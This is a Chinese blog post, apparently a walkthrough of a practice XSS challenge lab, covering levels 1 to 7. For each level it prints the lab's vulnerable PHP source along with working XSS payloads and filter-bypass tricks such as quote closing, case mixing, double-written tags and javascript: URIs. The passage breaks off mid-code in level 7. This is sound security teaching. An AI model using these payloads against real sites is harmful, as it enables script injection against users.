<!--
	作者：Sariay
	时间：2018-09-25
	描述：There may be a bug, but don't worry, QiLing(器灵) says that it can work normally!
-->
<!DOCTYPE html>
<html class="html-loading">
		

<head><meta name="generator" content="Hexo 3.9.0">
	<meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1.0, user-scalable=no">
  <title>
    
       | ST0new Blog
    
  </title>
  <meta name="author" content="ST0new">
  <meta name="keywords" content>
  <meta name="description" content="博观而约取，厚积而薄发">
	<!-- favicon -->
  <link rel="shortcut icon" href="/img/favicon.ico">

  <!-- css -->
  <link rel="stylesheet" href="https://cdn.bootcss.com/font-awesome/4.7.0/css/font-awesome.min.css">
<link rel="stylesheet" href="/css/Annie.css">
  
  <!-- jquery -->
	<script src="/js/jquery.min.js"></script>

  <!-- leancloud -->
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
<script src="/js/leancloud.js"></script>
</head>
	<body>
		<!-- Preloader -->

	<div id="preloader">
		<div class="pre-container">
			
				<div class="transition">
					<div class="three-bounce1"></div>
					<div class="three-bounce2"></div>
					<div class="three-bounce3"></div>
				</div>
						
		</div>
	</div>


<!-- header -->
<header class="fixbackground" data-img-mode="random" data-normal-src="/img/1.jpg" data-random-max="111" data-random-src="/img/Random-img/">
	<div class="mask">
		<!-- Logo and navigation -->
		<div class="h-header">
			<div id="logo">
				<a href="/">
						
						<img src="/img/logo.png" alt="Logo">
					
				</a>
			</div>
			
			<div id="navigation-show">
				<ul>
	
		<li class="menu-home">
			<a href="/" class="menu-item-home">主页</a>
		</li>
	
		<li class="menu-archive">
			<a href="/archives" class="menu-item-archive">归档</a>
		</li>
	
		<li class="menu-categories">
			<a href="/categories" class="menu-item-categories">分类</a>
		</li>
	
		<li class="menu-tags">
			<a href="/tags" class="menu-item-tags">标签</a>
		</li>
	
		<li class="menu-about">
			<a href="/about" class="menu-item-about">关于</a>
		</li>
	
		<li class="menu-links">
			<a href="/links" class="menu-item-links">links</a>
		</li>
	

	
		<li class="menu-search">
			<a href="javascript:;" class="popup-trigger">搜索</a>
		</li>
	
</ul>
			</div>				
		</div>

		<!-- motto -->
		<div class="h-body">	
			
				<p class="motto"></p>
			
		</div>
		
		<!-- others: such as time... -->			
		<div class="h-footer">
			<a href="javascript:;" id="read-more"><i class="fa fa-angle-double-down" aria-hidden="true"></i>
			</a>

			
				<!-- 
	This is only a demo, please go to "https://time.is" to set your city time! 
-->
<style type="text/css">
	.header-date {
		font-size: 1.6rem;
		color: #fff;
		position: absolute;
		bottom: 5px;
		right: 1rem;
		writing-mode: tb-rl;
	}	
	
	.header-date a {
		border-bottom: none;
	}

	@media only screen and (max-width: 768 ) {
		.header-date {
			font-size: 1rem;
		}			
	}
</style>
<div class="header-date">
	<a href="https://time.is/Beijing" id="time_is_link" rel="nofollow" ></a>
	<span id="Beijing_z43d"></span>
</div>
<script src="//widget.time.is/zh.js"></script>
<script>
	time_is_widget.init({
		Beijing_z43d:{
			template:"DATE", 
			date_format:"year年 monthname dnum日"
		}
	});
</script>
			
		</div>
	</div>
</header>

<div id="navigation-hide">
	<!-- Progress bar -->
	<div id="progress-bar"></div>

	<!-- Progress percent -->
	<div id="progress-percentage"><h1>0.0%</h1></div>

	<div class="toc-switch"><span class="switch-button">目录</span></div>

	<!-- Page title -->
	<p>
		
			当前文章&nbsp;:&nbsp;《》
		
	</p>

	<!-- Nav trigger for navigation-H-->
	<a class="nav-trigger"><span></span></a>
</div>

<!-- Navigation in div(id="navigation-H") -->
<nav class="nav-container" id="cd-nav">
	<div class="nav-header">
		<h3>Navigation</h3>
		<a href="javascript:;" class="nav-close"></a>
	</div>
	<div class="nav-body">
		<ul>
	
		<li class="menu-home">
			<a href="/" class="menu-item-home">主页</a>
		</li>
	
		<li class="menu-archive">
			<a href="/archives" class="menu-item-archive">归档</a>
		</li>
	
		<li class="menu-categories">
			<a href="/categories" class="menu-item-categories">分类</a>
		</li>
	
		<li class="menu-tags">
			<a href="/tags" class="menu-item-tags">标签</a>
		</li>
	
		<li class="menu-about">
			<a href="/about" class="menu-item-about">关于</a>
		</li>
	
		<li class="menu-links">
			<a href="/links" class="menu-item-links">links</a>
		</li>
	

	
		<li class="menu-search">
			<a href="javascript:;" class="popup-trigger">搜索</a>
		</li>
	
</ul>
	</div>
	<div class="nav-footer">
		<ul>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<i class="fa fa-github"></i>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<i class="fa fa-weibo"></i>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<i class="fa fa-pinterest"></i>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<i class="fa fa-instagram"></i>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<i class="fa fa-twitter"></i>
			</a>
		</li>
	
		<li>
			<a href="/atom.xml" target="_blank">
				<i class="fa fa-rss"></i>
			</a>
		</li>
			
</ul>

	</div>
</nav>
			
		<!--main-->
		<main>
			<!--
	时间：2018-11-17
	描述：
		插件名称：katelog.min.js
		插件作者：KELEN
		插件来源: https://github.com/KELEN/katelog
-->

	
		<div class="layout-toc">
			<div id="layout-toc">
				<div class="k-catelog-list" id="catelog-list" data-title="文章目录"></div>
			</div>
		</div>

		
		<script src="/plugin/toc/katelog.min.js"></script>

		
	 

<div class="layout-post">
	<div id="layout-post">
	<div class="article-title">
		<i class="fa fa-paper-plane-o" aria-hidden="true"></i>
		
	</div>

	<div class="article-meta">
		<span>
			<i class="fa fa-calendar"></i>
			


	发布于

	<a href="/2019/10/05/web安全/XSS/XSS闯关小游戏/" itemprop="url">
		<time datetime="2019-10-05T08:26:06.000Z" itemprop="datePublished">
	  		2019-10-05
	  </time>
	</a>
	&nbsp;





			




	更新于

	<a href="/2019/10/05/web安全/XSS/XSS闯关小游戏/" itemprop="url">
		<time datetime="2019-10-05T08:26:06.000Z" itemprop="dateUpdated">
	  		2019-10-05
	  </time>
	</a> 



		</span>
		<span>
			<i class="fa fa-tags"></i>
			
	
		<a href="/tags/xss/" class=" ">
			xss
		</a>
	
		
		</span>
		
		

	
    <span class="leancloud_visitors" id="/2019/10/05/web安全/XSS/XSS闯关小游戏/_visitors" data-url="/2019/10/05/web安全/XSS/XSS闯关小游戏/" data-title="">
       	<i class="fa fa-eye"></i>
       	热度
        <i class="leancloud_visitors_count" id="leancloud_visitors_count">0</i>
    </span>
    



	
    <span class="leancloud_likes" id="/2019/10/05/web安全/XSS/XSS闯关小游戏/_likes" data-url="/2019/10/05/web安全/XSS/XSS闯关小游戏/" data-title="" rel="unlike">
        <i class="fa fa-heart"></i>
        喜欢
        <i class="leancloud_likes_count" id="leancloud_likes_count">0</i>
    </span>

	</div>

	<div class="article-content" id="article-content">
		<h1 id="xss-通关小游戏"><a href="#xss-通关小游戏" class="headerlink" title="xss 通关小游戏"></a>xss 通关小游戏</h1><h2 id="搭建环境"><a href="#搭建环境" class="headerlink" title="搭建环境"></a>搭建环境</h2><p>下载 xss 通关小游戏</p>
<p>文件来自于：<a href="https://www.cnblogs.com/bmjoker/p/9446472.html" target="_blank" rel="noopener">https://www.cnblogs.com/bmjoker/p/9446472.html</a></p>
<blockquote>
<p>相信phpstudy</p>
<p>在官网安装最新版的phpstudy，通过360、火绒检查不存在问题后，安装到自定义目录下</p>
</blockquote>
<p><img src="https://upload-images.jianshu.io/upload_images/18851353-4e01f94b9b721694.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="1570177833994.png"></p>
<p>搭建非常简单，点两下，拖一个文件进去，就好了。</p>
<h2 id="通关之旅"><a href="#通关之旅" class="headerlink" title="通关之旅"></a>通关之旅</h2><blockquote>
<p>很张狂的一个小人，不服就来啊</p>
</blockquote>
<p><img src="https://upload-images.jianshu.io/upload_images/18851353-e52619f378e42db1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="1570178216576.png"></p>
<h3 id="Less1"><a href="#Less1" class="headerlink" title="Less1"></a>Less1</h3><p>第一关可以看到，url处输入的信息，会返回<code>欢迎用户xxx</code> 这让我想去注入一下，话说回来，赶紧看看怎么弹xss吧</p>
<p><img src="https://upload-images.jianshu.io/upload_images/18851353-e3bfd208b18f66e1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="1570178276534.png"></p>
<p>看一下前端的页面，是否存在过滤，没有绕过，只需要输入弹xss的语句就可以了</p>
<p><img src="https://upload-images.jianshu.io/upload_images/18851353-27c076c5cd8fdaaa.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="1570178710972.png"></p>
<p>上payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert(3444)&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>成功</p>
<p><img src="https://upload-images.jianshu.io/upload_images/18851353-04d75558e7ae7e07.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="1570178885846.png"></p>
<p>最后看一下源码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">ini_set(&quot;display_errors&quot;, 0);</span><br><span class="line">$str = $_GET[&quot;name&quot;];</span><br><span class="line">echo &quot;&lt;h2 align=center&gt;欢迎用户&quot;.$str.&quot;&lt;/h2&gt;&quot;;</span><br><span class="line">?&gt;</span><br><span class="line">&lt;center&gt;&lt;img src=level1.png&gt;&lt;/center&gt;</span><br><span class="line">&lt;?php </span><br><span class="line">echo &quot;&lt;h3 align=center&gt;payload的长度:&quot;.strlen($str).&quot;&lt;/h3&gt;&quot;;</span><br><span class="line">?&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>

<p>将拿到的值 直接放入去echo，xss无疑</p>
<p>然后测试了一下我收集的xss ，以下都可以通过</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">&lt;scRIpT&gt;new class extends confirm`4`&#123;&#125;&lt;/SCripT&gt; //绕过script大小写，括号，alert等函数</span><br><span class="line"></span><br><span class="line">&lt;script&gt;(((confirm)))`666`&lt;/script&gt; // 绕过括号，alert等函数限制</span><br><span class="line"></span><br><span class="line">&lt;script&gt;co\u006efirm(666)&lt;/script&gt;</span><br><span class="line"></span><br><span class="line">&lt;svg/onload=alert(1111)&gt;</span><br><span class="line"></span><br><span class="line">&lt;script&gt;&#123;confirm`NB`&#125;&lt;/script&gt;</span><br><span class="line"></span><br><span class="line">&lt;script&gt;alert`111`&lt;/script&gt;</span><br><span class="line"></span><br><span class="line">%3c/title%3e%3cscript%3ealert`%22xss%22`%3c/script%3e</span><br><span class="line"></span><br><span class="line">其中有的虽然弹了xss 但是没有跳转到下一关</span><br></pre></td></tr></table></figure>

<h3 id="Less2"><a href="#Less2" class="headerlink" title="Less2"></a>Less2</h3><p>看来这一关，有两个位置可以传参， 而且但是发现这两个位置是相同的，所以测试点只有一个</p>
<p><img src="https://upload-images.jianshu.io/upload_images/18851353-41d8eab648e5b9c0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="1570180389460.png"></p>
<p>看一下前端，传入一个简单的xss，发现<code>&lt;&gt;</code>都被转义了。</p>
<p><img src="https://upload-images.jianshu.io/upload_images/18851353-d284a9c6e4af1bed.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="1570180493035.png"></p>
<p>试试闭合</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload: &quot;&gt;&lt;script&gt;alert(555)&lt;/script&gt;&lt; // 绕过</span><br></pre></td></tr></table></figure>

<p>这里加“ 的目的是闭合前面的值，之后添加xss脚本即可成功弹shell</p>
<p><img src="https://upload-images.jianshu.io/upload_images/18851353-64e4334b34c3c335.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="1570181010970.png"></p>
<p>看看别人是如何弹的</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">payload</span><br><span class="line">&quot; onmouseover=alert(3)&gt; // 需要鼠标移动到输入框</span><br><span class="line">&quot; onclick=alert(4)&gt; // 需要点击</span><br><span class="line">&quot;&gt; &lt;img src = &quot;a&quot; onerror=&quot;alert(5)&quot;&gt;</span><br><span class="line">其实只要有“ 其他都随意了</span><br></pre></td></tr></table></figure>

<p>在试试fuzz<br><code>劝各位少试 ，崩了别怪我没提醒</code></p>
<p>差点忘记看源码了</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">ini_set(&quot;display_errors&quot;, 0);</span><br><span class="line">$str = $_GET[&quot;keyword&quot;];</span><br><span class="line">echo &quot;&lt;h2 align=center&gt;没有找到和&quot;.htmlspecialchars($str).&quot;相关的结果.&lt;/h2&gt;&quot;.&apos;&lt;center&gt;</span><br><span class="line">&lt;form action=level2.php method=GET&gt;</span><br><span class="line">&lt;input name=keyword  value=&quot;&apos;.$str.&apos;&quot;&gt;</span><br><span class="line">&lt;input type=submit name=submit value=&quot;搜索&quot;/&gt;</span><br><span class="line">&lt;/form&gt;</span><br><span class="line">&lt;/center&gt;&apos;;</span><br><span class="line">?&gt;</span><br><span class="line">&lt;center&gt;&lt;img src=level2.png&gt;&lt;/center&gt;</span><br><span class="line">&lt;?php </span><br><span class="line">echo &quot;&lt;h3 align=center&gt;payload的长度:&quot;.strlen($str).&quot;&lt;/h3&gt;&quot;;</span><br><span class="line">?&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br><span class="line"></span><br><span class="line">多了个函数htmlspecialchars</span><br><span class="line">看看他的用法</span><br><span class="line"></span><br><span class="line">将特殊字符转换为 HTML 实体， 包括： &amp; &quot; &apos; &lt; &gt;</span><br><span class="line">所以直接去执行简单的payload都会被过滤，但是过滤不严格，使用“&gt; 闭合之后 函数就是失效了</span><br></pre></td></tr></table></figure>

<h3 id="Less3"><a href="#Less3" class="headerlink" title="Less3"></a>Less3</h3><blockquote>
<p>先用简单的去看看</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;&lt;script&gt;alert(6)&lt;/script&gt; //&quot;  &lt; &gt; 都被绕过&lt;/pre&gt;</span><br></pre></td></tr></table></figure>

<p><img src="https://upload-images.jianshu.io/upload_images/18851353-4d7334bbd44f9507.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="1570183909634.png"></p>
<p>那么就需要没有这几个特征的,比如上一关提到的 点击事件和划过窗口事件</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&apos; onmousedown=&apos;alert(7)  闭合</span><br><span class="line">&apos; onclick=&apos;alert(8)</span><br><span class="line">&lt;input name=keyword  value=&apos;&quot;.htmlspecialchars($str).&quot;onmousedown=&apos;alert(9) &apos;&gt;</span><br><span class="line">&apos; onmousedown=alert(10)// 注释</span><br><span class="line">&apos; onclick=alert(11)//</span><br><span class="line">&lt;input name=keyword  value=&apos;&quot;.htmlspecialchars($str).&quot;onclick=alert(12)// &apos;&gt;</span><br></pre></td></tr></table></figure>

<p><img src="https://upload-images.jianshu.io/upload_images/18851353-c868e170b7fcf8a1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="1570184810646.png"></p>
<p>看一下代码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">ini_set(&quot;display_errors&quot;, 0);</span><br><span class="line">$str = $_GET[&quot;keyword&quot;];</span><br><span class="line">echo &quot;&lt;h2 align=center&gt;没有找到和&quot;.htmlspecialchars($str).&quot;相关的结果.&lt;/h2&gt;&quot;.&quot;&lt;center&gt;</span><br><span class="line">&lt;form action=level3.php method=GET&gt;</span><br><span class="line">&lt;input name=keyword  value=&apos;&quot;.htmlspecialchars($str).&quot;&apos;&gt;</span><br><span class="line">&lt;input type=submit name=submit value=搜索 /&gt;</span><br><span class="line">&lt;/form&gt;</span><br><span class="line">&lt;/center&gt;&quot;;</span><br><span class="line">?&gt;</span><br><span class="line">&lt;center&gt;&lt;img src=level3.png&gt;&lt;/center&gt;</span><br><span class="line">&lt;?php </span><br><span class="line">echo &quot;&lt;h3 align=center&gt;payload的长度:&quot;.strlen($str).&quot;&lt;/h3&gt;&quot;;</span><br><span class="line">?&gt;</span><br><span class="line"></span><br><span class="line">这里也用了htmlspecialchars ，但是通过 .. 去追加的，所以不能直接使用双引号进行绕过</span><br><span class="line">从value中可以看到单引号引起，所以使用单引号去闭合。</span><br></pre></td></tr></table></figure>

<h3 id="Less-4"><a href="#Less-4" class="headerlink" title="Less-4"></a>Less-4</h3><blockquote>
<p>尝试拿payload 去试，看看 过滤了什么<br>发现之后’ 没有被过滤，那么 这里很可能只有单引号属于正常的</p>
</blockquote>
<p><img src="https://upload-images.jianshu.io/upload_images/18851353-a8307174dac8de02.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="1570186377800.png"></p>
<p>尝试双引号闭合，发现这道题和上一道可能就是单引号和双引号的区别了</p>
<p><img src="https://upload-images.jianshu.io/upload_images/18851353-140b6f139bd47101.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="1570186447377.png"></p>
<p>看看源码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">ini_set(&quot;display_errors&quot;, 0);</span><br><span class="line">$str = $_GET[&quot;keyword&quot;];</span><br><span class="line">$str2=str_replace(&quot;&gt;&quot;,&quot;&quot;,$str);</span><br><span class="line">$str3=str_replace(&quot;&lt;&quot;,&quot;&quot;,$str2);</span><br><span class="line">echo &quot;&lt;h2 align=center&gt;没有找到和&quot;.htmlspecialchars($str).&quot;相关的结果.&lt;/h2&gt;&quot;.&apos;&lt;center&gt;</span><br><span class="line">&lt;form action=level4.php method=GET&gt;</span><br><span class="line">&lt;input name=keyword  value=&quot;&apos;.$str3.&apos;&quot;&gt;</span><br><span class="line">&lt;input type=submit name=submit value=搜索 /&gt;</span><br><span class="line">&lt;/form&gt;</span><br><span class="line">&lt;/center&gt;&apos;;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">这里添加一个payload</span><br><span class="line">&quot;onfocus=alert(13) autofocus=&quot;   //onfocus 事件在对象获得焦点时发生。同样可以放在第三关去绕过</span><br><span class="line">或者 </span><br><span class="line">&quot; onfocus=alert(14) //</span><br></pre></td></tr></table></figure>

<h3 id="Less-5"><a href="#Less-5" class="headerlink" title="Less-5"></a>Less-5</h3><p>先查看过滤的内容 经过测试发现 on，script被过滤了，这时尝试使用其他的函数绕过</p>
<p><img src="https://upload-images.jianshu.io/upload_images/18851353-214e4b663b611ad4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="1570188039661.png"></p>
<p><img src="https://upload-images.jianshu.io/upload_images/18851353-57017760f651ebe2.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="1570188154325.png"></p>
<p>这时想到还有javascript可以使用</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">payload</span><br><span class="line">&quot;&gt;&lt;iframe src=javascript:alert(15)&gt;</span><br><span class="line"></span><br><span class="line">&quot;&gt; &lt;iframe src=&quot;javascript:alert(16)&quot;&gt;</span><br></pre></td></tr></table></figure>

<p><img src="https://upload-images.jianshu.io/upload_images/18851353-99c6e9d62e2d7eb1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="1570188390066.png"></p>
<p>但是没有出来下一关提示，别急，还有，herf也可以用</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;&gt;&lt;a href=&quot;javascript:alert(17)&quot;&gt;</span><br></pre></td></tr></table></figure>

<p>点击标签，成功绕过<br><img src="https://upload-images.jianshu.io/upload_images/18851353-bd78d719e2df57d1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="1570188777396.png"></p>
<p>看下源码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">ini_set(&quot;display_errors&quot;, 0);</span><br><span class="line">$str = strtolower($_GET[&quot;keyword&quot;]);</span><br><span class="line">$str2=str_replace(&quot;&lt;script&quot;,&quot;&lt;scr_ipt&quot;,$str);</span><br><span class="line">$str3=str_replace(&quot;on&quot;,&quot;o_n&quot;,$str2);</span><br><span class="line">echo &quot;&lt;h2 align=center&gt;没有找到和&quot;.htmlspecialchars($str).&quot;相关的结果.&lt;/h2&gt;&quot;.&apos;&lt;center&gt;</span><br><span class="line">&lt;form action=level5.php method=GET&gt;</span><br><span class="line">&lt;input name=keyword  value=&quot;&apos;.$str3.&apos;&quot;&gt;</span><br><span class="line">&lt;input type=submit name=submit value=搜索 /&gt;</span><br><span class="line">&lt;/form&gt;</span><br><span class="line">&lt;/center&gt;&apos;;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>先转了小写， 大小写失效了，之后替换，script失效了，然后on 事件也失效了，之后就可以想想其他过滤， href可以，ifame 也可以，&lt;&gt; 正常，所以限制也就少了<br>所以这次可以通过javascript去执行语句，将javascript嵌套到href或ifame都可以实现绕过</p>
<h3 id="Less-6"><a href="#Less-6" class="headerlink" title="Less-6"></a>Less-6</h3><blockquote>
<p>随便输入，查看过滤了什么</p>
</blockquote>
<p><img src="https://upload-images.jianshu.io/upload_images/18851353-239f436b3718ebe2.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="1570189440237.png"></p>
<p>‘ o_nmousedown=alert(8)//  script也被过滤了</p>
<p><img src="https://upload-images.jianshu.io/upload_images/18851353-beda4b67d17e6eda.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="1570189440237.png"></p>
<p>试试上一题的payload “&gt;<a href="javascript:alert(19)" target="_blank" rel="noopener"></a></p>
<p>href 也被过滤了</p>
<p><img src="https://upload-images.jianshu.io/upload_images/18851353-bb36fb53a6bed160.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="1570189606811.png"></p>
<p>src 也被过滤了</p>
<p><img src="https://upload-images.jianshu.io/upload_images/18851353-42bd30262c324f23.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="1570189606811.png"></p>
<p>这时 有点蒙了，都过滤了，怎么测，想起来还有个大小写没有试<br>果然 天无绝人之路 大小写没有过滤</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&quot;&gt;&lt;iframe sRc=javascript:alert(20)&gt;</span><br><span class="line">&quot;&gt;&lt;a hREf=&quot;javascript:alert(21)&quot;&gt;</span><br></pre></td></tr></table></figure>

<p><img src="https://upload-images.jianshu.io/upload_images/18851353-8d715f68b44d517b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="1570189698861.png"></p>
<p>看看源码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">ini_set(&quot;display_errors&quot;, 0);</span><br><span class="line">$str = $_GET[&quot;keyword&quot;];</span><br><span class="line">$str2=str_replace(&quot;&lt;script&quot;,&quot;&lt;scr_ipt&quot;,$str);</span><br><span class="line">$str3=str_replace(&quot;on&quot;,&quot;o_n&quot;,$str2);</span><br><span class="line">$str4=str_replace(&quot;src&quot;,&quot;sr_c&quot;,$str3);</span><br><span class="line">$str5=str_replace(&quot;data&quot;,&quot;da_ta&quot;,$str4);</span><br><span class="line">$str6=str_replace(&quot;href&quot;,&quot;hr_ef&quot;,$str5);</span><br><span class="line">echo &quot;&lt;h2 align=center&gt;没有找到和&quot;.htmlspecialchars($str).&quot;相关的结果.&lt;/h2&gt;&quot;.&apos;&lt;center&gt;</span><br><span class="line">&lt;form action=level6.php method=GET&gt;</span><br><span class="line">&lt;input name=keyword  value=&quot;&apos;.$str6.&apos;&quot;&gt;</span><br><span class="line">&lt;input type=submit name=submit value=搜索 /&gt;</span><br><span class="line">&lt;/form&gt;</span><br><span class="line">&lt;/center&gt;&apos;;</span><br><span class="line">?&gt;</span><br><span class="line">可以当做黑名单过滤</span><br><span class="line">script，on，src，data，href</span><br><span class="line">这里首次出现了data，查阅一下资料，看看data是如何触发xss的</span><br><span class="line">data:text/html,alert(&apos;xss&apos;);&lt;/pre&gt;</span><br></pre></td></tr></table></figure>

<h3 id="Less-7"><a href="#Less-7" class="headerlink" title="Less-7"></a>Less-7</h3><blockquote>
<p>方法不变测试过滤</p>
<p>这次是检测到删除，双引号被过滤</p>
</blockquote>
<p><img src="https://upload-images.jianshu.io/upload_images/18851353-a16b6019edbc4af7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="1570190052543.png"></p>
<blockquote>
<p>删除 如果是匹配删除，那么双写即可绕过</p>
<p>paylaod: “&gt;<scscriptript>alert(/xss/)</scscriptript></p>
</blockquote>
<p><img src="https://upload-images.jianshu.io/upload_images/18851353-840f4e0369e15e7e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="1570190355881.png"></p>
<p>看看源码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">ini_set(&quot;display_errors&quot;, 0);</span><br><span class="line">$str =strtolower( $_GET[&quot;keyword&quot;]);</span><br><span class="line">$str2=str_replace(&quot;script&quot;,&quot;&quot;,$str);</span><br><span class="line">$str3=str_replace(&quot;on&quot;,&quot;&quot;,$str2);</span><br><span class="line">$str4=str_replace(&quot;src&quot;,&quot;&quot;,$str3);</span><br><span class="line">$str5=str_replace(&quot;data&quot;,&quot;&quot;,$str4);</span><br><span class="line">$str6=str_replace(&quot;href&quot;,&quot;&quot;,$str5);</span><br><span class="line">echo &quot;&lt;h2 align=center&gt;没有找到和&quot;.htmlspecialchars($str).&quot;相关的结果.&lt;/h2&gt;&quot;.&apos;&lt;center&gt;</span><br><span class="line">&lt;form action=level7.php 